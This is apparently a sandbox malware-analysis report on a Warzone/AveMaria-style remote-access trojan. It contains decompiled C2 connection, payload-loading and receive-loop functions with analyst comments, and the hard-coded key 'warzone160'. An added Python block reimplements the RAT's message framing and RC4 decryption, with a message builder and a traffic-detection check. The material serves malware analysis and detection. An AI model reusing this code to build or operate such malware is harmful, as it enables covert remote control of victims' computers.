                                                                    • CharNextA.USER32(00000000,?,00000000,?), ref: 00405E54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext
                                                                    • String ID:
                                                                    • API String ID: 3213498283-0
                                                                    • Opcode ID: fc50a8ba57276cf7c451b02e99d65dd48bd1661959ad76e8046885eb8c4734bb
                                                                    • Instruction ID: c6cb30f28e6c2ad1043868ec40e8f38a31f7cf81a7171e88b5cc5b0539237374
                                                                    • Opcode Fuzzy Hash: fc50a8ba57276cf7c451b02e99d65dd48bd1661959ad76e8046885eb8c4734bb
                                                                    • Instruction Fuzzy Hash: DEA12FF0A046298BDB609F24CC547AAB7B4EB44304F1440FED649B7281DB799E85CFAD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,?,?,00000000,00000000), ref: 00405285
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004052A8
                                                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 004052F6
                                                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000100,00000000,00000000,00000000,?), ref: 00405341
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00405352
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00405386
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Close$Enum$Open
                                                                    • String ID:
                                                                    • API String ID: 4245071059-0
                                                                    • Opcode ID: 7d455bfb623c1b42d872ad24fdb4c120c767aaf94a8f0a7a2d7cb43f7c612b61
                                                                    • Instruction ID: ecc4f38d2bccc58703b5dd31ef463ab4612dc509b67db1981ea8fb0a29fbedc2
                                                                    • Opcode Fuzzy Hash: 7d455bfb623c1b42d872ad24fdb4c120c767aaf94a8f0a7a2d7cb43f7c612b61
                                                                    • Instruction Fuzzy Hash: 95412BB1D0122C9BDB25CB15CC45BDBBBB8EB58350F0141E9A908A7280DBB49E84CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E02D157FB(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v28;
                                                                    				intOrPtr _v32;
                                                                    				void _v40;
                                                                    				void* _t36;
                                                                    				signed int _t40;
                                                                    				signed int _t42;
                                                                    				void* _t44;
                                                                    				signed int _t47;
                                                                    				intOrPtr _t53;
                                                                    				intOrPtr _t54;
                                                                    				signed int* _t55;
                                                                    
                                                                    				_v8 = _v8 & 0x00000000;
                                                                    				_t44 = __ecx;
                                                                    				E02D13125(__ecx,  &_a4);
                                                                    				 *((intOrPtr*)(_t44 + 4)) = _a8;
                                                                    				E02D2026F(_t44 + 0x1d8);
                                                                    				_t47 = 8;
                                                                    				memset( &_v40, 0, _t47 << 2);
                                                                    				_v28 = 6;
                                                                    				_t36 =  &_v40;
                                                                    				_t53 = 1;
                                                                    				_v32 = 1;
                                                                    				__imp__getaddrinfo(_a4, 0, _t36,  &_v8);
                                                                    				if(_t36 != 0) {
                                                                    					L4:
                                                                    					_t53 = 0;
                                                                    				} else {
                                                                    					_t54 =  *((intOrPtr*)(_v8 + 0x18));
                                                                    					_t40 = 2;
                                                                    					__imp__#23(_t40, 1, 0);
                                                                    					 *(_t44 + 0xc) = _t40;
                                                                    					if(_t40 == 0xffffffff) {
                                                                    						goto L4;
                                                                    					} else {
                                                                    						_t55 = _t44 + 0x1c8;
                                                                    						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
                                                                    						_t42 = 2;
                                                                    						 *_t55 = _t42;
                                                                    						__imp__#9(_a8);
                                                                    						 *(_t44 + 0x1ca) = _t42;
                                                                    						__imp__freeaddrinfo(_v8);
                                                                    						__imp__#4( *(_t44 + 0xc), _t55, 0x10);
                                                                    						if(_t42 != 0xffffffff) {
                                                                    							 *((intOrPtr*)(_t44 + 8)) = 1;
                                                                    							ReleaseMutex( *(_t44 + 0x1d8));
                                                                    						} else {
                                                                    							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
                                                                    							goto L4;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				E02D15EA5(_a4);
                                                                    				return _t53;
                                                                    			}















                                                                    0x02d15801
                                                                    0x02d1580c
                                                                    0x02d1580e
                                                                    0x02d1581c
                                                                    0x02d1581f

                                                                    APIs
                                                                      • Part of subcall function 02D13125: lstrcatA.KERNEL32(00000000,745D0770,?,00000000,?,02D135C4,00000000,00000000,?,02D14E98,?,?,?,?,?,00000000), ref: 02D13151
                                                                      • Part of subcall function 02D2026F: WaitForSingleObject.KERNEL32(?,000000FF,02D15824,745D0770,?,?,00000000,02D14EA0,?,?,?,?,?,00000000,745D0770), ref: 02D20273
                                                                    • getaddrinfo.WS2_32(745D0770,00000000,02D14EA0,00000000), ref: 02D15848
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 02D1585F
                                                                    • htons.WS2_32(00000000), ref: 02D15885
                                                                    • freeaddrinfo.WS2_32(00000000), ref: 02D15895
                                                                    • connect.WS2_32(?,?,00000010), ref: 02D158A1
                                                                    • ReleaseMutex.KERNEL32(?), ref: 02D158CB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                                                    • String ID:
                                                                    • API String ID: 2516106447-0
                                                                    • Opcode ID: 672770af6d68803e74272dc6836cd289bf9de4a821807d3781dfd21372390071
                                                                    • Instruction ID: 9b3417c3656405ce83012d6b7d622ba5d8287f19eb958db3ad472cb2a9142b6e
                                                                    • Opcode Fuzzy Hash: 672770af6d68803e74272dc6836cd289bf9de4a821807d3781dfd21372390071
                                                                    • Instruction Fuzzy Hash: 0E215A71A40204EBDF10DF61E888BDABBB9FF94320F118466ED19AB290D7719D54CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 82%
                                                                    			E02D1CBA8(WCHAR* __ecx, void** __edx, long* _a4) {
                                                                    				void** _v8;
                                                                    				long _v12;
                                                                    				intOrPtr _v16;
                                                                    				long _v20;
                                                                    				long* _t14;
                                                                    				long _t16;
                                                                    				void* _t17;
                                                                    				long* _t24;
                                                                    				void* _t32;
                                                                    				struct _OVERLAPPED* _t34;
                                                                    				void* _t36;
                                                                    
                                                                    				_t34 = 0;
                                                                    				_v8 = __edx;
                                                                    				_t36 =  *0x2d297ac - _t34; // 0x0  global flag: 0 = read the payload from a file, non-zero = decode it from a base64 string in E02D1CC54
                                                                    				if(_t36 == 0) {
                                                                    					_t32 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0, 0); // GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING
                                                                    					if(_t32 != 0 && _t32 != 0xffffffff) {
                                                                    						_t14 =  &_v20;
                                                                    						__imp__GetFileSizeEx(_t32, _t14);
                                                                    						if(_t14 != 0 && _v16 == 0) {
                                                                    							_t16 = _v20;
                                                                    							_t24 = _a4;
                                                                    							 *_t24 = _t16;
                                                                    							_t17 = LocalAlloc(0x40, _t16); // LPTR: fixed, zero-initialised buffer sized to the file (low dword only; _v16 == 0 was checked above)
                                                                    							 *_v8 = _t17;
                                                                    							if(_t17 != 0) {
                                                                    								if(ReadFile(_t32, _t17,  *_t24,  &_v12, 0) == 0 ||  *_t24 != _v12) { // whole file must arrive in one ReadFile call, otherwise the buffer is released
                                                                    									LocalFree( *_v8);
                                                                    								} else {
                                                                    									_t34 = 1;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						CloseHandle(_t32);
                                                                    					}
                                                                    				} else {
                                                                    					_t34 = E02D1CC54(__ecx, __edx, _a4); // base64 path: CryptStringToBinaryW with dwFlags 1 (CRYPT_STRING_BASE64), see the subcall APIs below
                                                                    				}
                                                                    				return _t34;
                                                                    			}


                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000,?), ref: 02D1CBDC
                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 02D1CBF2
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 02D1CC0D
                                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?), ref: 02D1CC25
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 02D1CC48
                                                                      • Part of subcall function 02D1CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D1CC73
                                                                      • Part of subcall function 02D1CC54: LocalAlloc.KERNEL32(00000040,?,?,02D1CBC6,?,00000000,?,00000000,?), ref: 02D1CC81
                                                                      • Part of subcall function 02D1CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D1CC97
                                                                      • Part of subcall function 02D1CC54: LocalFree.KERNEL32(?,?,02D1CBC6,?,00000000,?,00000000,?), ref: 02D1CCA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 4225742195-0
                                                                    • Opcode ID: 762cbc526056f4cf44214f4fea64f7a5c8de0543c0f10f768e362d707a902020
                                                                    • Instruction ID: 965e87525d58e24a7b2b9f997eec17d72058940499618633a5c53587c6458d0e
                                                                    • Opcode Fuzzy Hash: 762cbc526056f4cf44214f4fea64f7a5c8de0543c0f10f768e362d707a902020
                                                                    • Instruction Fuzzy Hash: 0811C071A80124FBCB258F69EC84EAEBBBAEF45650B004416F901E6350D7309D10CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00409485,004086B2,00407FA2), ref: 0040949C
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004094AA
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004094C3
                                                                    • SetLastError.KERNEL32(00000000,00409485,004086B2,00407FA2), ref: 00409515
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 08ba525f145b752384ec4a42338f895a0cc512e83347dc4fdfca3017925d1146
                                                                    • Instruction ID: f74a0ce81c29b786a64de25dc9735e668b2b2bb70e1fcb643dfecedf037582c2
                                                                    • Opcode Fuzzy Hash: 08ba525f145b752384ec4a42338f895a0cc512e83347dc4fdfca3017925d1146
                                                                    • Instruction Fuzzy Hash: 9D01F13A20A7116EE7222B766C858A76758DB5237C720023FF920721E3EE3E4C11614E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID: }@
                                                                    • API String ID: 1740715915-2912179412
                                                                    • Opcode ID: c1c9ab8c0afdd89c8a9d5626c4c84074ae2314385de9e56e62548992c5b542cf
                                                                    • Instruction ID: 357d1c2884cbd0d031beb62869e10f3ec091ef4f3fd5d6824de8185d1c940450
                                                                    • Opcode Fuzzy Hash: c1c9ab8c0afdd89c8a9d5626c4c84074ae2314385de9e56e62548992c5b542cf
                                                                    • Instruction Fuzzy Hash: 1251E272605202AFDB298F56D941BBB77A4EF50304F14493FE805672D2EB3AEC51CB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 84%
                                                                    			E02D1562F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                    				char _v12;
                                                                    				char _v16;
                                                                    				char _v20;
                                                                    				char _v24;
                                                                    				char _v28;
                                                                    				char _v36;
                                                                    				char _v44;
                                                                    				char _v52;
                                                                    				char _v56;
                                                                    				char _v60;
                                                                    				char _v65600;
                                                                    				void* _t47;
                                                                    				char* _t54;
                                                                    				intOrPtr _t79;
                                                                    				void* _t85;
                                                                    				void* _t88;
                                                                    				void* _t89;
                                                                    				void* _t114;
                                                                    				char* _t115;
                                                                    				char _t117;
                                                                    				void* _t118;
                                                                    				void* _t119;
                                                                    				void* _t120;
                                                                    
                                                                    				_t114 = __edx;
                                                                    				_t89 = __ecx;
                                                                    				_t47 = E02D11190(0x10040, __ecx);
                                                                    				_t88 = _t89;
                                                                    				if( *((intOrPtr*)(_t88 + 0xc)) != 0xffffffff) {
                                                                    					_v28 = 0xea60; // 60000 ms
                                                                    					__imp__#21( *((intOrPtr*)(_t88 + 0xc)), 0xffff, 0x1006,  &_v28, 4); // ws2_32 ordinal 21 = setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &timeout, 4)
                                                                    					_t117 = 0;
                                                                    					E02D11052( &_v65600, 0, 0xffff);
                                                                    					_t120 = _t119 + 0xc;
                                                                    					_v60 = 0;
                                                                    					_v56 = 0;
                                                                    					E02D13003( &_v52, _t114, E02D133BF( &_v12, "warzone160")); // key material from the hard-coded string "warzone160"; _v52 is later passed to E02D160AA with the received bytes
                                                                    					E02D15EA5(_v12);
                                                                    					_v24 = 0;
                                                                    					_v20 = 0;
                                                                    					while(1) {
                                                                    						_t54 =  &_v65600;
                                                                    						__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t54, 0xc, _t117); // ws2_32 ordinal 16 = recv(sock, buf, 12, flags): fixed 12-byte message header
                                                                    						_t115 = _t54;
                                                                    						if(_t115 != 0xc) { // anything but a full header read is handled at L8
                                                                    							goto L8;
                                                                    						}
                                                                    						_v16 = _t117;
                                                                    						_t106 =  &_v16;
                                                                    						_v12 = _t117;
                                                                    						E02D12F91( &_v16,  &_v65600, _t54);
                                                                    						_t107 = _t120;
                                                                    						E02D1304C(_t120,  &_v16);
                                                                    						E02D1304C(_t120,  &_v52);
                                                                    						E02D160AA( &_v44, _t114, _t120, _t107,  &_v16, _t106);
                                                                    						_t120 = _t120 + 0x10;
                                                                    						_t79 =  *((intOrPtr*)(_v44 + 4)); // body length: dword at offset 4 of the transformed header
                                                                    						_t118 = _t79 + 0xc; // total message size = 12-byte header + body
                                                                    						if(_t79 == 0 || _t118 == _t115) { // empty body, or everything already received
                                                                    							L7:
                                                                    							E02D13036( &_v44);
                                                                    							E02D13036( &_v16);
                                                                    							L9:
                                                                    							_t96 =  &_v24;
                                                                    							E02D12F91( &_v24,  &_v65600, _t115);
                                                                    							_t97 = _t120;
                                                                    							E02D1304C(_t120,  &_v24);
                                                                    							E02D1304C(_t120,  &_v52);
                                                                    							E02D160AA( &_v36, _t114, _t120, _t97,  &_v24, _t96);
                                                                    							_t120 = _t120 + 0x10;
                                                                    							E02D12FC3(_t88 + 0x10);
                                                                    							E02D12F91(_t88 + 0x10, _v36, _t115);
                                                                    							E02D12FC3( &_v24);
                                                                    							E02D12FC3( &_v36);
                                                                    							E02D14F65(_t88, _t114, _a4);
                                                                    							E02D13036( &_v36);
                                                                    							if(_t115 <= 0) {
                                                                    								goto L12;
                                                                    							}
                                                                    							_t117 = 0;
                                                                    							continue;
                                                                    						} else {
                                                                    							while(1) {
                                                                    								_t85 =  &_v65600 + _t115;
                                                                    								__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t85, _t118 - _t115, 0); // recv the rest of the body in chunks until _t115 reaches _t118; SOCKET_ERROR (-1) aborts
                                                                    								if(_t85 == 0xffffffff) {
                                                                    									break;
                                                                    								}
                                                                    								_t115 = _t115 + _t85;
                                                                    								if(_t118 != _t115) {
                                                                    									continue;
                                                                    								}
                                                                    								goto L7;
                                                                    							}
                                                                    							E02D13036( &_v44);
                                                                    							E02D13036( &_v16);
                                                                    							L12:
                                                                    							E02D13036( &_v24);
                                                                    							E02D13036( &_v52);
                                                                    							return E02D13036( &_v60);
                                                                    						}
                                                                    						L8:
                                                                    						if(_t115 == 0xffffffff) {
                                                                    							goto L12;
                                                                    						}
                                                                    						goto L9;
                                                                    					}
                                                                    				}
                                                                    				return _t47;
                                                                    			}
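The receive loop decompiled above, modelled in Python as an added example (not code from the report or from the sample): it reproduces the 12-byte header read, the body-length lookup at header offset 4, the chunked recv until `length + 12` bytes are in, and the final whole-buffer transform. The page shows the key string but does not name the cipher behind E02D160AA; this model assumes RC4, as documented for the Warzone/AveMaria family, and treats the two header dwords the decompilation never reads as opaque. `StreamSocket`, `build_message`, `looks_like_frame` and the sample body are constructed here for offline use and are not the sample's own code.

```python
"""Added example: Python model of the E02D1562F receive loop.

Assumptions not stated on the report page: E02D160AA keyed with "warzone160"
is RC4; only the dword at header offset 4 (body length) is interpreted, the
other two header dwords are opaque; the message below is constructed, not
captured.
"""
import struct
from typing import Optional

HEADER_LEN = 12          # the sample first recv()s exactly 12 bytes
KEY = b"warzone160"      # hard-coded string handed to E02D133BF


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_message(body: bytes) -> bytes:
    """Constructed framing: 12-byte header (body length at offset 4, the other
    dwords left zero) followed by the body, encrypted as one RC4 stream.
    One stream from offset 0 is what the decompilation implies: it transforms
    the 12-byte header alone, then re-transforms the complete buffer."""
    header = struct.pack("<III", 0, len(body), 0)
    return rc4(KEY, header + body)


def header_body_length(enc_header: bytes) -> int:
    """Mirror of `_t79 = *(dword*)(transformed_header + 4)`."""
    return struct.unpack_from("<I", rc4(KEY, enc_header[:HEADER_LEN]), 4)[0]


class StreamSocket:
    """Stand-in for recv() over a captured byte stream; returns at most
    `chunk` bytes per call so the partial-read loop is exercised."""

    def __init__(self, data: bytes, chunk: int = 12):
        self._data, self._chunk, self._pos = data, chunk, 0

    def recv(self, n: int) -> bytes:
        piece = self._data[self._pos:self._pos + min(n, self._chunk)]
        self._pos += len(piece)
        return piece


def read_message(sock) -> Optional[bytes]:
    """Returns the decrypted header+body, or None where the loop bails out
    (recv error, or the stream ends before `length + 12` bytes arrived)."""
    buf = sock.recv(HEADER_LEN)
    if len(buf) != HEADER_LEN:
        # The sample still hands a short non-error read to its handler (L8 -> L9);
        # this model treats it as malformed and stops.
        return None
    total = header_body_length(buf) + HEADER_LEN      # _t118 = _t79 + 0xc
    while len(buf) < total:                           # inner recv() loop until _t118 == _t115
        piece = sock.recv(total - len(buf))
        if not piece:                                 # SOCKET_ERROR / peer closed -> L12
            return None
        buf += piece
    return rc4(KEY, buf)                              # full-buffer transform, as stored at obj+0x10


def looks_like_frame(stream: bytes) -> bool:
    """Offline check for one direction of a captured TCP payload: with the
    known key, the decrypted length field must account for exactly the bytes present."""
    if len(stream) < HEADER_LEN:
        return False
    return header_body_length(stream) + HEADER_LEN == len(stream)


if __name__ == "__main__":
    wire = build_message(b"constructed command body")   # constructed, not captured
    plain = read_message(StreamSocket(wire, chunk=12))
    print(plain[HEADER_LEN:])
```

For a capture, feed the TCP payload of one direction to `looks_like_frame` and then `read_message`; because ws2_32 ordinal 21 is setsockopt and the loop sets SO_RCVTIMEO to 60000 ms first, a live session that stalls for more than a minute on any read drops out of this loop at L12.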

                                                                    0x02d156fa
                                                                    0x02d15702
                                                                    0x02d15705
                                                                    0x02d15708
                                                                    0x02d1570d
                                                                    0x02d1573b
                                                                    0x02d1573e
                                                                    0x02d15746
                                                                    0x02d15756
                                                                    0x02d1575e
                                                                    0x02d15761
                                                                    0x02d1576b
                                                                    0x02d1576e
                                                                    0x02d1577b
                                                                    0x02d15783
                                                                    0x02d15788
                                                                    0x02d1578e
                                                                    0x02d1579a
                                                                    0x02d157a2
                                                                    0x02d157aa
                                                                    0x02d157b4
                                                                    0x02d157bc
                                                                    0x02d157c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d157c5
                                                                    0x00000000
                                                                    0x02d15713
                                                                    0x02d15713
                                                                    0x02d15720
                                                                    0x02d15726
                                                                    0x02d1572f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d15735
                                                                    0x02d15739
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d15739
                                                                    0x02d157cf
                                                                    0x02d157d7
                                                                    0x02d157dc
                                                                    0x02d157df
                                                                    0x02d157e7
                                                                    0x00000000
                                                                    0x02d157ef
                                                                    0x02d1574d
                                                                    0x02d15750
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d15750
                                                                    0x02d156a9
                                                                    0x02d157f8

                                                                    APIs
                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 02D15666
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,745D0770,?,02D15A4F,.bss,00000000), ref: 02D133C8
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,?,02D15A4F,.bss,00000000), ref: 02D133D5
                                                                      • Part of subcall function 02D133BF: lstrcpyA.KERNEL32(00000000,?,?,02D15A4F,.bss,00000000), ref: 02D133E8
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 02D156B6
                                                                    • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 02D15726
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                                                    • String ID: `$warzone160
                                                                    • API String ID: 3973575906-811885577
                                                                    • Opcode ID: 8b4413affa737bf4b5587ae44aef04dc47764c5b002ed839554d0cf4f5e84a23
                                                                    • Instruction ID: d53204d6ece4fca7f1ee9e4d4122864a5dc8537bcb03a9743179bd79e6a72020
                                                                    • Opcode Fuzzy Hash: 8b4413affa737bf4b5587ae44aef04dc47764c5b002ed839554d0cf4f5e84a23
                                                                    • Instruction Fuzzy Hash: C3516E71D00118BACF25EF61FC85DEEBB7AEF54360F500169E815A6690EB349E48CEB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @4o$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                    • API String ID: 0-3440025040
                                                                    • Opcode ID: 7b096d1ae813de5a11d7bd3bc01f5e9eab5b3330bf7c90b6959ea4c9cbf75557
                                                                    • Instruction ID: 956e86031d763e11a7c7375fec47e8157eb24153588bfd8a9b74ca5733fe2300
